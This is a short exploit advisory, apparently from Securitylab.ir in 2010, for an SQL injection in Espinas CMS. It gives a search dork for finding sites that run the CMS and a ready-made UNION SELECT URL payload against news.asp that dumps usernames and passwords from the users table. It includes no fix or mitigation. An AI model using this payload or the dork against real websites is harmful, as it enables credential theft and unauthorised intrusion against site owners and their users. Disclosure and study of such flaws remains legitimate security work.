Espinas CMS SQL Injection Vulnerability.pdf

1 ################################################################# 2 # Securitylab.ir 3 ################################################################# 4 # Application Info: 5 # Name: Espinas CMS 6 # Vendor: http://espinas.ir 7 ################################################################# 8 # Vulnerability Info: 9 # Type: Sql Injection 10 # Risk: Medium 11 # Dork: "Powered by Espinas IT" 12 ################################################################# 13 Vulnerability: 14 http://site.ir/news.asp?id=−1+union+select+1,concat(username,0x3a,0x3a,password),3,4,5+from+sinabed_users 15 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 16 17 ################################################################# 18 # Discoverd By: Pouya Daneshmand 19 # Website: http://Pouya.Securitylab.ir 20 # Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com 21 ################################################################### 22 23 Page 1/1 Espinas CMS SQL Injection Vulnerability Pouya Daneshmand 04/07/2010